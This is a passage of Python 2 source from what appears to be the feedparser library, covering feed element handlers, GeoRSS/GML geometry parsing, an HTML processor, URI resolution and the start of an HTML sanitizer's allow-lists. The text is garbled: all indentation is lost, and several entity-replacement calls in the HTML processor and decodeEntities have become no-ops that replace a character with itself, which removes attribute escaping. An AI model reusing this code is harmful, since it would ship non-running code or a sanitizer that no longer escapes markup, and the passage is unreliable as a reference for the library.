def _start_dc_language(self, attrsD):
self.push('language', 1)
_start_language = _start_dc_language
def _end_dc_language(self):
self.lang = self.pop('language')
_end_language = _end_dc_language
def _start_dc_publisher(self, attrsD):
self.push('publisher', 1)
_start_webmaster = _start_dc_publisher
def _end_dc_publisher(self):
self.pop('publisher')
self._sync_author_detail('publisher')
_end_webmaster = _end_dc_publisher
def _start_published(self, attrsD):
self.push('published', 1)
_start_dcterms_issued = _start_published
_start_issued = _start_published
_start_pubdate = _start_published
def _end_published(self):
value = self.pop('published')
self._save('published_parsed', _parse_date(value), overwrite=True)
_end_dcterms_issued = _end_published
_end_issued = _end_published
_end_pubdate = _end_published
def _start_updated(self, attrsD):
self.push('updated', 1)
_start_modified = _start_updated
_start_dcterms_modified = _start_updated
_start_dc_date = _start_updated
_start_lastbuilddate = _start_updated
def _end_updated(self):
value = self.pop('updated')
parsed_value = _parse_date(value)
self._save('updated_parsed', parsed_value, overwrite=True)
_end_modified = _end_updated
_end_dcterms_modified = _end_updated
_end_dc_date = _end_updated
_end_lastbuilddate = _end_updated
def _start_created(self, attrsD):
self.push('created', 1)
_start_dcterms_created = _start_created
def _end_created(self):
value = self.pop('created')
self._save('created_parsed', _parse_date(value), overwrite=True)
_end_dcterms_created = _end_created
def _start_expirationdate(self, attrsD):
self.push('expired', 1)
def _end_expirationdate(self):
self._save('expired_parsed', _parse_date(self.pop('expired')), overwrite=True)
# geospatial location, or "where", from georss.org
def _start_georssgeom(self, attrsD):
self.push('geometry', 0)
context = self._getContext()
context['where'] = FeedParserDict()
_start_georss_point = _start_georssgeom
_start_georss_line = _start_georssgeom
_start_georss_polygon = _start_georssgeom
_start_georss_box = _start_georssgeom
def _save_where(self, geometry):
context = self._getContext()
context['where'].update(geometry)
def _end_georss_point(self):
geometry = _parse_georss_point(self.pop('geometry'))
if geometry:
self._save_where(geometry)
def _end_georss_line(self):
geometry = _parse_georss_line(self.pop('geometry'))
if geometry:
self._save_where(geometry)
def _end_georss_polygon(self):
this = self.pop('geometry')
geometry = _parse_georss_polygon(this)
if geometry:
self._save_where(geometry)
def _end_georss_box(self):
geometry = _parse_georss_box(self.pop('geometry'))
if geometry:
self._save_where(geometry)
def _start_where(self, attrsD):
self.push('where', 0)
context = self._getContext()
context['where'] = FeedParserDict()
_start_georss_where = _start_where
def _parse_srs_attrs(self, attrsD):
srsName = attrsD.get('srsname')
try:
srsDimension = int(attrsD.get('srsdimension', '2'))
except ValueError:
srsDimension = 2
context = self._getContext()
context['where']['srsName'] = srsName
context['where']['srsDimension'] = srsDimension
def _start_gml_point(self, attrsD):
self._parse_srs_attrs(attrsD)
self.ingeometry = 1
self.push('geometry', 0)
def _start_gml_linestring(self, attrsD):
self._parse_srs_attrs(attrsD)
self.ingeometry = 'linestring'
self.push('geometry', 0)
def _start_gml_polygon(self, attrsD):
self._parse_srs_attrs(attrsD)
self.push('geometry', 0)
def _start_gml_exterior(self, attrsD):
self.push('geometry', 0)
def _start_gml_linearring(self, attrsD):
self.ingeometry = 'polygon'
self.push('geometry', 0)
def _start_gml_pos(self, attrsD):
self.push('pos', 0)
def _end_gml_pos(self):
this = self.pop('pos')
context = self._getContext()
srsName = context['where'].get('srsName')
srsDimension = context['where'].get('srsDimension', 2)
swap = True
if srsName and "EPSG" in srsName:
epsg = int(srsName.split(":")[-1])
swap = bool(epsg in _geogCS)
geometry = _parse_georss_point(this, swap=swap, dims=srsDimension)
if geometry:
self._save_where(geometry)
def _start_gml_poslist(self, attrsD):
self.push('pos', 0)
def _end_gml_poslist(self):
this = self.pop('pos')
context = self._getContext()
srsName = context['where'].get('srsName')
srsDimension = context['where'].get('srsDimension', 2)
swap = True
if srsName and "EPSG" in srsName:
epsg = int(srsName.split(":")[-1])
swap = bool(epsg in _geogCS)
geometry = _parse_poslist(
this, self.ingeometry, swap=swap, dims=srsDimension)
if geometry:
self._save_where(geometry)
def _end_geom(self):
self.ingeometry = 0
self.pop('geometry')
_end_gml_point = _end_geom
_end_gml_linestring = _end_geom
_end_gml_linearring = _end_geom
_end_gml_exterior = _end_geom
_end_gml_polygon = _end_geom
def _end_where(self):
self.pop('where')
_end_georss_where = _end_where
# end geospatial
def _start_cc_license(self, attrsD):
context = self._getContext()
value = self._getAttribute(attrsD, 'rdf:resource')
attrsD = FeedParserDict()
attrsD['rel'] = u'license'
if value:
attrsD['href']=value
context.setdefault('links', []).append(attrsD)
def _start_creativecommons_license(self, attrsD):
self.push('license', 1)
_start_creativeCommons_license = _start_creativecommons_license
def _end_creativecommons_license(self):
value = self.pop('license')
context = self._getContext()
attrsD = FeedParserDict()
attrsD['rel'] = u'license'
if value:
attrsD['href'] = value
context.setdefault('links', []).append(attrsD)
del context['license']
_end_creativeCommons_license = _end_creativecommons_license
def _addTag(self, term, scheme, label):
context = self._getContext()
tags = context.setdefault('tags', [])
if (not term) and (not scheme) and (not label):
return
value = FeedParserDict({'term': term, 'scheme': scheme, 'label': label})
if value not in tags:
tags.append(value)
def _start_category(self, attrsD):
term = attrsD.get('term')
scheme = attrsD.get('scheme', attrsD.get('domain'))
label = attrsD.get('label')
self._addTag(term, scheme, label)
self.push('category', 1)
_start_dc_subject = _start_category
_start_keywords = _start_category
def _start_media_category(self, attrsD):
attrsD.setdefault('scheme', u'http://search.yahoo.com/mrss/category_schema')
self._start_category(attrsD)
def _end_itunes_keywords(self):
for term in self.pop('itunes_keywords').split(','):
if term.strip():
self._addTag(term.strip(), u'http://www.itunes.com/', None)
def _start_itunes_category(self, attrsD):
self._addTag(attrsD.get('text'), u'http://www.itunes.com/', None)
self.push('category', 1)
def _end_category(self):
value = self.pop('category')
if not value:
return
context = self._getContext()
tags = context['tags']
if value and len(tags) and not tags[-1]['term']:
tags[-1]['term'] = value
else:
self._addTag(value, None, None)
_end_dc_subject = _end_category
_end_keywords = _end_category
_end_itunes_category = _end_category
_end_media_category = _end_category
def _start_cloud(self, attrsD):
self._getContext()['cloud'] = FeedParserDict(attrsD)
def _start_link(self, attrsD):
attrsD.setdefault('rel', u'alternate')
if attrsD['rel'] == u'self':
attrsD.setdefault('type', u'application/atom+xml')
else:
attrsD.setdefault('type', u'text/html')
context = self._getContext()
attrsD = self._itsAnHrefDamnIt(attrsD)
if 'href' in attrsD:
attrsD['href'] = self.resolveURI(attrsD['href'])
expectingText = self.infeed or self.inentry or self.insource
context.setdefault('links', [])
if not (self.inentry and self.inimage):
context['links'].append(FeedParserDict(attrsD))
if 'href' in attrsD:
expectingText = 0
if (attrsD.get('rel') == u'alternate') and (self.mapContentType(attrsD.get('type')) in self.html_types):
context['link'] = attrsD['href']
else:
self.push('link', expectingText)
def _end_link(self):
value = self.pop('link')
def _start_guid(self, attrsD):
self.guidislink = (attrsD.get('ispermalink', 'true') == 'true')
self.push('id', 1)
_start_id = _start_guid
def _end_guid(self):
value = self.pop('id')
self._save('guidislink', self.guidislink and 'link' not in self._getContext())
if self.guidislink:
# guid acts as link, but only if 'ispermalink' is not present or is 'true',
# and only if the item doesn't already have a link element
self._save('link', value)
_end_id = _end_guid
def _start_title(self, attrsD):
if self.svgOK:
return self.unknown_starttag('title', attrsD.items())
self.pushContent('title', attrsD, u'text/plain', self.infeed or self.inentry or self.insource)
_start_dc_title = _start_title
_start_media_title = _start_title
def _end_title(self):
if self.svgOK:
return
value = self.popContent('title')
if not value:
return
self.title_depth = self.depth
_end_dc_title = _end_title
def _end_media_title(self):
title_depth = self.title_depth
self._end_title()
self.title_depth = title_depth
def _start_description(self, attrsD):
context = self._getContext()
if 'summary' in context:
self._summaryKey = 'content'
self._start_content(attrsD)
else:
self.pushContent('description', attrsD, u'text/html', self.infeed or self.inentry or self.insource)
_start_dc_description = _start_description
_start_media_description = _start_description
def _start_abstract(self, attrsD):
self.pushContent('description', attrsD, u'text/plain', self.infeed or self.inentry or self.insource)
def _end_description(self):
if self._summaryKey == 'content':
self._end_content()
else:
value = self.popContent('description')
self._summaryKey = None
_end_abstract = _end_description
_end_dc_description = _end_description
_end_media_description = _end_description
def _start_info(self, attrsD):
self.pushContent('info', attrsD, u'text/plain', 1)
_start_feedburner_browserfriendly = _start_info
def _end_info(self):
self.popContent('info')
_end_feedburner_browserfriendly = _end_info
def _start_generator(self, attrsD):
if attrsD:
attrsD = self._itsAnHrefDamnIt(attrsD)
if 'href' in attrsD:
attrsD['href'] = self.resolveURI(attrsD['href'])
self._getContext()['generator_detail'] = FeedParserDict(attrsD)
self.push('generator', 1)
def _end_generator(self):
value = self.pop('generator')
context = self._getContext()
if 'generator_detail' in context:
context['generator_detail']['name'] = value
def _start_admin_generatoragent(self, attrsD):
self.push('generator', 1)
value = self._getAttribute(attrsD, 'rdf:resource')
if value:
self.elementstack[-1][2].append(value)
self.pop('generator')
self._getContext()['generator_detail'] = FeedParserDict({'href': value})
def _start_admin_errorreportsto(self, attrsD):
self.push('errorreportsto', 1)
value = self._getAttribute(attrsD, 'rdf:resource')
if value:
self.elementstack[-1][2].append(value)
self.pop('errorreportsto')
def _start_summary(self, attrsD):
context = self._getContext()
if 'summary' in context:
self._summaryKey = 'content'
self._start_content(attrsD)
else:
self._summaryKey = 'summary'
self.pushContent(self._summaryKey, attrsD, u'text/plain', 1)
_start_itunes_summary = _start_summary
def _end_summary(self):
if self._summaryKey == 'content':
self._end_content()
else:
self.popContent(self._summaryKey or 'summary')
self._summaryKey = None
_end_itunes_summary = _end_summary
def _start_enclosure(self, attrsD):
attrsD = self._itsAnHrefDamnIt(attrsD)
context = self._getContext()
attrsD['rel'] = u'enclosure'
context.setdefault('links', []).append(FeedParserDict(attrsD))
def _start_source(self, attrsD):
if 'url' in attrsD:
# This means that we're processing a source element from an RSS 2.0 feed
self.sourcedata['href'] = attrsD[u'url']
self.push('source', 1)
self.insource = 1
self.title_depth = -1
def _end_source(self):
self.insource = 0
value = self.pop('source')
if value:
self.sourcedata['title'] = value
self._getContext()['source'] = copy.deepcopy(self.sourcedata)
self.sourcedata.clear()
def _start_content(self, attrsD):
self.pushContent('content', attrsD, u'text/plain', 1)
src = attrsD.get('src')
if src:
self.contentparams['src'] = src
self.push('content', 1)
def _start_body(self, attrsD):
self.pushContent('content', attrsD, u'application/xhtml+xml', 1)
_start_xhtml_body = _start_body
def _start_content_encoded(self, attrsD):
self.pushContent('content', attrsD, u'text/html', 1)
_start_fullitem = _start_content_encoded
def _end_content(self):
copyToSummary = self.mapContentType(self.contentparams.get('type')) in ([u'text/plain'] + self.html_types)
value = self.popContent('content')
if copyToSummary:
self._save('summary', value)
_end_body = _end_content
_end_xhtml_body = _end_content
_end_content_encoded = _end_content
_end_fullitem = _end_content
def _start_itunes_image(self, attrsD):
self.push('itunes_image', 0)
if attrsD.get('href'):
self._getContext()['image'] = FeedParserDict({'href': attrsD.get('href')})
elif attrsD.get('url'):
self._getContext()['image'] = FeedParserDict({'href': attrsD.get('url')})
_start_itunes_link = _start_itunes_image
def _end_itunes_block(self):
value = self.pop('itunes_block', 0)
self._getContext()['itunes_block'] = (value == 'yes') and 1 or 0
def _end_itunes_explicit(self):
value = self.pop('itunes_explicit', 0)
# Convert 'yes' -> True, 'clean' to False, and any other value to None
# False and None both evaluate as False, so the difference can be ignored
# by applications that only need to know if the content is explicit.
self._getContext()['itunes_explicit'] = (None, False, True)[(value == 'yes' and 2) or value == 'clean' or 0]
def _start_media_group(self, attrsD):
# don't do anything, but don't break the enclosed tags either
pass
def _start_media_credit(self, attrsD):
context = self._getContext()
context.setdefault('media_credit', [])
context['media_credit'].append(attrsD)
self.push('credit', 1)
def _end_media_credit(self):
credit = self.pop('credit')
if credit != None and len(credit.strip()) != 0:
context = self._getContext()
context['media_credit'][-1]['content'] = credit
def _start_media_restriction(self, attrsD):
context = self._getContext()
context.setdefault('media_restriction', attrsD)
self.push('restriction', 1)
def _end_media_restriction(self):
restriction = self.pop('restriction')
if restriction != None and len(restriction.strip()) != 0:
context = self._getContext()
context['media_restriction']['content'] = restriction
def _start_media_license(self, attrsD):
context = self._getContext()
context.setdefault('media_license', attrsD)
self.push('license', 1)
def _end_media_license(self):
license = self.pop('license')
if license != None and len(license.strip()) != 0:
context = self._getContext()
context['media_license']['content'] = license
def _start_media_content(self, attrsD):
context = self._getContext()
context.setdefault('media_content', [])
context['media_content'].append(attrsD)
def _start_media_thumbnail(self, attrsD):
context = self._getContext()
context.setdefault('media_thumbnail', [])
self.push('url', 1) # new
context['media_thumbnail'].append(attrsD)
def _end_media_thumbnail(self):
url = self.pop('url')
context = self._getContext()
if url != None and len(url.strip()) != 0:
if 'url' not in context['media_thumbnail'][-1]:
context['media_thumbnail'][-1]['url'] = url
def _start_media_player(self, attrsD):
self.push('media_player', 0)
self._getContext()['media_player'] = FeedParserDict(attrsD)
def _end_media_player(self):
value = self.pop('media_player')
context = self._getContext()
context['media_player']['content'] = value
def _start_newlocation(self, attrsD):
self.push('newlocation', 1)
def _end_newlocation(self):
url = self.pop('newlocation')
context = self._getContext()
# don't set newlocation if the context isn't right
if context is not self.feeddata:
return
context['newlocation'] = _makeSafeAbsoluteURI(self.baseuri, url.strip())
def _start_psc_chapters(self, attrsD):
if self.psc_chapters_flag is None:
# Transition from None -> True
self.psc_chapters_flag = True
attrsD['chapters'] = []
self._getContext()['psc_chapters'] = FeedParserDict(attrsD)
def _end_psc_chapters(self):
# Transition from True -> False
self.psc_chapters_flag = False
def _start_psc_chapter(self, attrsD):
if self.psc_chapters_flag:
start = self._getAttribute(attrsD, 'start')
attrsD['start_parsed'] = _parse_psc_chapter_start(start)
context = self._getContext()['psc_chapters']
context['chapters'].append(FeedParserDict(attrsD))
if _XML_AVAILABLE:
class _StrictFeedParser(_FeedParserMixin, xml.sax.handler.ContentHandler):
def __init__(self, baseuri, baselang, encoding):
xml.sax.handler.ContentHandler.__init__(self)
_FeedParserMixin.__init__(self, baseuri, baselang, encoding)
self.bozo = 0
self.exc = None
self.decls = {}
def startPrefixMapping(self, prefix, uri):
if not uri:
return
# Jython uses '' instead of None; standardize on None
prefix = prefix or None
self.trackNamespace(prefix, uri)
if prefix and uri == 'http://www.w3.org/1999/xlink':
self.decls['xmlns:' + prefix] = uri
def startElementNS(self, name, qname, attrs):
namespace, localname = name
lowernamespace = str(namespace or '').lower()
if lowernamespace.find(u'backend.userland.com/rss') <> -1:
# match any backend.userland.com namespace
namespace = u'http://backend.userland.com/rss'
lowernamespace = namespace
if qname and qname.find(':') > 0:
givenprefix = qname.split(':')[0]
else:
givenprefix = None
prefix = self._matchnamespaces.get(lowernamespace, givenprefix)
if givenprefix and (prefix == None or (prefix == '' and lowernamespace == '')) and givenprefix not in self.namespacesInUse:
raise UndeclaredNamespace, "'%s' is not associated with a namespace" % givenprefix
localname = str(localname).lower()
# qname implementation is horribly broken in Python 2.1 (it
# doesn't report any), and slightly broken in Python 2.2 (it
# doesn't report the xml: namespace). So we match up namespaces
# with a known list first, and then possibly override them with
# the qnames the SAX parser gives us (if indeed it gives us any
# at all). Thanks to MatejC for helping me test this and
# tirelessly telling me that it didn't work yet.
attrsD, self.decls = self.decls, {}
if localname=='math' and namespace=='http://www.w3.org/1998/Math/MathML':
attrsD['xmlns']=namespace
if localname=='svg' and namespace=='http://www.w3.org/2000/svg':
attrsD['xmlns']=namespace
if prefix:
localname = prefix.lower() + ':' + localname
elif namespace and not qname: #Expat
for name,value in self.namespacesInUse.items():
if name and value == namespace:
localname = name + ':' + localname
break
for (namespace, attrlocalname), attrvalue in attrs.items():
lowernamespace = (namespace or '').lower()
prefix = self._matchnamespaces.get(lowernamespace, '')
if prefix:
attrlocalname = prefix + ':' + attrlocalname
attrsD[str(attrlocalname).lower()] = attrvalue
for qname in attrs.getQNames():
attrsD[str(qname).lower()] = attrs.getValueByQName(qname)
localname = str(localname).lower()
self.unknown_starttag(localname, attrsD.items())
def characters(self, text):
self.handle_data(text)
def endElementNS(self, name, qname):
namespace, localname = name
lowernamespace = str(namespace or '').lower()
if qname and qname.find(':') > 0:
givenprefix = qname.split(':')[0]
else:
givenprefix = ''
prefix = self._matchnamespaces.get(lowernamespace, givenprefix)
if prefix:
localname = prefix + ':' + localname
elif namespace and not qname: #Expat
for name,value in self.namespacesInUse.items():
if name and value == namespace:
localname = name + ':' + localname
break
localname = str(localname).lower()
self.unknown_endtag(localname)
def error(self, exc):
self.bozo = 1
self.exc = exc
# drv_libxml2 calls warning() in some cases
warning = error
def fatalError(self, exc):
self.error(exc)
raise exc
class _BaseHTMLProcessor(sgmllib.SGMLParser):
special = re.compile('''[<>'"]''')
bare_ampersand = re.compile("&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)")
elements_no_end_tag = set([
'area', 'base', 'basefont', 'br', 'col', 'command', 'embed', 'frame',
'hr', 'img', 'input', 'isindex', 'keygen', 'link', 'meta', 'param',
'source', 'track', 'wbr'
])
def __init__(self, encoding, _type):
self.encoding = encoding
self._type = _type
sgmllib.SGMLParser.__init__(self)
def reset(self):
self.pieces = []
sgmllib.SGMLParser.reset(self)
def _shorttag_replace(self, match):
tag = match.group(1)
if tag in self.elements_no_end_tag:
return '<' + tag + ' />'
else:
return '<' + tag + '></' + tag + '>'
# By declaring these methods and overriding their compiled code
# with the code from sgmllib, the original code will execute in
# feedparser's scope instead of sgmllib's. This means that the
# `tagfind` and `charref` regular expressions will be found as
# they're declared above, not as they're declared in sgmllib.
def goahead(self, i):
pass
goahead.func_code = sgmllib.SGMLParser.goahead.func_code
def __parse_starttag(self, i):
pass
__parse_starttag.func_code = sgmllib.SGMLParser.parse_starttag.func_code
def parse_starttag(self,i):
j = self.__parse_starttag(i)
if self._type == 'application/xhtml+xml':
if j>2 and self.rawdata[j-2:j]=='/>':
self.unknown_endtag(self.lasttag)
return j
def feed(self, data):
data = re.compile(r'<!((?!DOCTYPE|--|\[))', re.IGNORECASE).sub(r'<!\1', data)
data = re.sub(r'<([^<>\s]+?)\s*/>', self._shorttag_replace, data)
data = data.replace(''', "'")
data = data.replace('"', '"')
try:
bytes
if bytes is str:
raise NameError
self.encoding = self.encoding + u'_INVALID_PYTHON_3'
except NameError:
if self.encoding and isinstance(data, unicode):
data = data.encode(self.encoding)
sgmllib.SGMLParser.feed(self, data)
sgmllib.SGMLParser.close(self)
def normalize_attrs(self, attrs):
if not attrs:
return attrs
# utility method to be called by descendants
attrs = dict([(k.lower(), v) for k, v in attrs]).items()
attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in attrs]
attrs.sort()
return attrs
def unknown_starttag(self, tag, attrs):
# called for each start tag
# attrs is a list of (attr, value) tuples
# e.g. for <pre class='screen'>, tag='pre', attrs=[('class', 'screen')]
uattrs = []
strattrs=''
if attrs:
for key, value in attrs:
value=value.replace('>','>').replace('<','<').replace('"','"')
value = self.bare_ampersand.sub("&", value)
# thanks to Kevin Marks for this breathtaking hack to deal with (valid) high-bit attribute values in UTF-8 feeds
if not isinstance(value, unicode):
value = value.decode(self.encoding, 'ignore')
try:
# Currently, in Python 3 the key is already a str, and cannot be decoded again
uattrs.append((unicode(key, self.encoding), value))
except TypeError:
uattrs.append((key, value))
strattrs = u''.join([u' %s="%s"' % (key, value) for key, value in uattrs])
if self.encoding:
try:
strattrs = strattrs.encode(self.encoding)
except (UnicodeEncodeError, LookupError):
pass
if tag in self.elements_no_end_tag:
self.pieces.append('<%s%s />' % (tag, strattrs))
else:
self.pieces.append('<%s%s>' % (tag, strattrs))
def unknown_endtag(self, tag):
# called for each end tag, e.g. for </pre>, tag will be 'pre'
# Reconstruct the original end tag.
if tag not in self.elements_no_end_tag:
self.pieces.append("</%s>" % tag)
def handle_charref(self, ref):
# called for each character reference, e.g. for ' ', ref will be '160'
# Reconstruct the original character reference.
ref = ref.lower()
if ref.startswith('x'):
value = int(ref[1:], 16)
else:
value = int(ref)
if value in _cp1252:
self.pieces.append('&#%s;' % hex(ord(_cp1252[value]))[1:])
else:
self.pieces.append('&#%s;' % ref)
def handle_entityref(self, ref):
# called for each entity reference, e.g. for '©', ref will be 'copy'
# Reconstruct the original entity reference.
if ref in name2codepoint or ref == 'apos':
self.pieces.append('&%s;' % ref)
else:
self.pieces.append('&%s' % ref)
def handle_data(self, text):
# called for each block of plain text, i.e. outside of any tag and
# not containing any character or entity references
# Store the original text verbatim.
self.pieces.append(text)
def handle_comment(self, text):
# called for each HTML comment, e.g. <!-- insert Javascript code here -->
# Reconstruct the original comment.
self.pieces.append('<!--%s-->' % text)
def handle_pi(self, text):
# called for each processing instruction, e.g. <?instruction>
# Reconstruct original processing instruction.
self.pieces.append('<?%s>' % text)
def handle_decl(self, text):
# called for the DOCTYPE, if present, e.g.
# <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
# "http://www.w3.org/TR/html4/loose.dtd">
# Reconstruct original DOCTYPE
self.pieces.append('<!%s>' % text)
_new_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9:]*\s*').match
def _scan_name(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
if i == n:
return None, -1
m = self._new_declname_match(rawdata, i)
if m:
s = m.group()
name = s.strip()
if (i + len(s)) == n:
return None, -1 # end of buffer
return name.lower(), m.end()
else:
self.handle_data(rawdata)
# self.updatepos(declstartpos, i)
return None, -1
def convert_charref(self, name):
return '&#%s;' % name
def convert_entityref(self, name):
return '&%s;' % name
def output(self):
'''Return processed HTML as a single string'''
return ''.join([str(p) for p in self.pieces])
def parse_declaration(self, i):
try:
return sgmllib.SGMLParser.parse_declaration(self, i)
except sgmllib.SGMLParseError:
# escape the doctype declaration and continue parsing
self.handle_data('<')
return i+1
class _LooseFeedParser(_FeedParserMixin, _BaseHTMLProcessor):
def __init__(self, baseuri, baselang, encoding, entities):
sgmllib.SGMLParser.__init__(self)
_FeedParserMixin.__init__(self, baseuri, baselang, encoding)
_BaseHTMLProcessor.__init__(self, encoding, 'application/xhtml+xml')
self.entities=entities
def decodeEntities(self, element, data):
data = data.replace('<', '<')
data = data.replace('<', '<')
data = data.replace('<', '<')
data = data.replace('>', '>')
data = data.replace('>', '>')
data = data.replace('>', '>')
data = data.replace('&', '&')
data = data.replace('&', '&')
data = data.replace('"', '"')
data = data.replace('"', '"')
data = data.replace(''', ''')
data = data.replace(''', ''')
if not self.contentparams.get('type', u'xml').endswith(u'xml'):
data = data.replace('<', '<')
data = data.replace('>', '>')
data = data.replace('&', '&')
data = data.replace('"', '"')
data = data.replace(''', "'")
return data
def strattrs(self, attrs):
return ''.join([' %s="%s"' % (n,v.replace('"','"')) for n,v in attrs])
class _RelativeURIResolver(_BaseHTMLProcessor):
relative_uris = set([('a', 'href'),
('applet', 'codebase'),
('area', 'href'),
('blockquote', 'cite'),
('body', 'background'),
('del', 'cite'),
('form', 'action'),
('frame', 'longdesc'),
('frame', 'src'),
('iframe', 'longdesc'),
('iframe', 'src'),
('head', 'profile'),
('img', 'longdesc'),
('img', 'src'),
('img', 'usemap'),
('input', 'src'),
('input', 'usemap'),
('ins', 'cite'),
('link', 'href'),
('object', 'classid'),
('object', 'codebase'),
('object', 'data'),
('object', 'usemap'),
('q', 'cite'),
('script', 'src'),
('video', 'poster')])
def __init__(self, baseuri, encoding, _type):
_BaseHTMLProcessor.__init__(self, encoding, _type)
self.baseuri = baseuri
def resolveURI(self, uri):
return _makeSafeAbsoluteURI(self.baseuri, uri.strip())
def unknown_starttag(self, tag, attrs):
attrs = self.normalize_attrs(attrs)
attrs = [(key, ((tag, key) in self.relative_uris) and self.resolveURI(value) or value) for key, value in attrs]
_BaseHTMLProcessor.unknown_starttag(self, tag, attrs)
def _resolveRelativeURIs(htmlSource, baseURI, encoding, _type):
if not _SGML_AVAILABLE:
return htmlSource
p = _RelativeURIResolver(baseURI, encoding, _type)
p.feed(htmlSource)
return p.output()
def _makeSafeAbsoluteURI(base, rel=None):
# bail if ACCEPTABLE_URI_SCHEMES is empty
if not ACCEPTABLE_URI_SCHEMES:
return _urljoin(base, rel or u'')
if not base:
return rel or u''
if not rel:
try:
scheme = urlparse.urlparse(base)[0]
except ValueError:
return u''
if not scheme or scheme in ACCEPTABLE_URI_SCHEMES:
return base
return u''
uri = _urljoin(base, rel)
if uri.strip().split(':', 1)[0] not in ACCEPTABLE_URI_SCHEMES:
return u''
return uri
class _HTMLSanitizer(_BaseHTMLProcessor):
acceptable_elements = set(['a', 'abbr', 'acronym', 'address', 'area',
'article', 'aside', 'audio', 'b', 'big', 'blockquote', 'br', 'button',
'canvas', 'caption', 'center', 'cite', 'code', 'col', 'colgroup',
'command', 'datagrid', 'datalist', 'dd', 'del', 'details', 'dfn',
'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'event-source', 'fieldset',
'figcaption', 'figure', 'footer', 'font', 'form', 'header', 'h1',
'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins',
'keygen', 'kbd', 'label', 'legend', 'li', 'm', 'map', 'menu', 'meter',
'multicol', 'nav', 'nextid', 'ol', 'output', 'optgroup', 'option',
'p', 'pre', 'progress', 'q', 's', 'samp', 'section', 'select',
'small', 'sound', 'source', 'spacer', 'span', 'strike', 'strong',
'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'time', 'tfoot',
'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var', 'video', 'noscript'])
acceptable_attributes = set(['abbr', 'accept', 'accept-charset', 'accesskey',
'action', 'align', 'alt', 'autocomplete', 'autofocus', 'axis',
'background', 'balance', 'bgcolor', 'bgproperties', 'border',
'bordercolor', 'bordercolordark', 'bordercolorlight', 'bottompadding',
'cellpadding', 'cellspacing', 'ch', 'challenge', 'char', 'charoff',
'choff', 'charset', 'checked', 'cite', 'class', 'clear', 'color', 'cols',
'colspan', 'compact', 'contenteditable', 'controls', 'coords', 'data',
'datafld', 'datapagesize', 'datasrc', 'datetime', 'default', 'delay',
'dir', 'disabled', 'draggable', 'dynsrc', 'enctype', 'end', 'face', 'for',
'form', 'frame', 'galleryimg', 'gutter', 'headers', 'height', 'hidefocus',
'hidden', 'high', 'href', 'hreflang', 'hspace', 'icon', 'id', 'inputmode',
'ismap', 'keytype', 'label', 'leftspacing', 'lang', 'list', 'longdesc',
'loop', 'loopcount', 'loopend', 'loopstart', 'low', 'lowsrc', 'max',
'maxlength', 'media', 'method', 'min', 'multiple', 'name', 'nohref',
'noshade', 'nowrap', 'open', 'optimum', 'pattern', 'ping', 'point-size',
'poster', 'pqg', 'preload', 'prompt', 'radiogroup', 'readonly', 'rel',
'repeat-max', 'repeat-min', 'replace', 'required', 'rev', 'rightspacing',
'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size', 'span',
'src', 'start', 'step', 'summary', 'suppress', 'tabindex', 'target',
'template', 'title', 'toppadding', 'type', 'unselectable', 'usemap',
'urn', 'valign', 'value', 'variable', 'volume', 'vspace', 'vrml',
'width', 'wrap', 'xml:lang'])
unacceptable_elements_with_end_tag = set(['script', 'applet', 'style'])
acceptable_css_properties = set(['azimuth', 'background-color',
'border-bottom-color', 'border-collapse', 'border-color',
'border-left-color', 'border-right-color', 'border-top-color', 'clear',
'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font',
'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight',
'height', 'letter-spacing', 'line-height', 'overflow', 'pause',
'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness',
'speak', 'speak-header', 'speak-numeral', 'speak-punctuation',
'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent',
'unicode-bidi', 'vertical-align', 'voice-family', 'volume',
'white-space', 'width'])
# survey of common keywords found in feeds
acceptable_css_keywords = set(['auto', 'aqua', 'black', 'block', 'blue',
'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed',
'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left',
'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive',
'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top',
'transparent', 'underline', 'white', 'yellow'])
valid_css_values = re.compile('^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|' +
'\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$')
mathml_elements = set(['annotation', 'annotation-xml', 'maction', 'math',
'merror', 'mfenced', 'mfrac', 'mi', 'mmultiscripts', 'mn', 'mo', 'mover', 'mpadded',
'mphantom', 'mprescripts', 'mroot', 'mrow', 'mspace', 'msqrt', 'mstyle',
'msub', 'msubsup', 'msup', 'mtable', 'mtd', 'mtext', 'mtr', 'munder',
'munderover', 'none', 'semantics'])
mathml_attributes = set(['actiontype', 'align', 'columnalign', 'columnalign',
'columnalign', 'close', 'columnlines', 'columnspacing', 'columnspan', 'depth',
'display', 'displaystyle', 'encoding', 'equalcolumns', 'equalrows',
'fence', 'fontstyle', 'fontweight', 'frame', 'height', 'linethickness',
'lspace', 'mathbackground', 'mathcolor', 'mathvariant', 'mathvariant',
'maxsize', 'minsize', 'open', 'other', 'rowalign', 'rowalign', 'rowalign',
'rowlines', 'rowspacing', 'rowspan', 'rspace', 'scriptlevel', 'selection',
'separator', 'separators', 'stretchy', 'width', 'width', 'xlink:href',
'xlink:show', 'xlink:type', 'xmlns', 'xmlns:xlink'])
# svgtiny - foreignObject + linearGradient + radialGradient + stop
svg_elements = set(['a', 'animate', 'animateColor', 'animateMotion',
'animateTransform', 'circle', 'defs', 'desc', 'ellipse', 'foreignObject',
'font-face', 'font-face-name', 'font-face-src', 'g', 'glyph', 'hkern',
'linearGradient', 'line', 'marker', 'metadata', 'missing-glyph', 'mpath',
'path', 'polygon', 'polyline', 'radialGradient', 'rect', 'set', 'stop',
'svg', 'switch', 'text', 'title', 'tspan', 'use'])
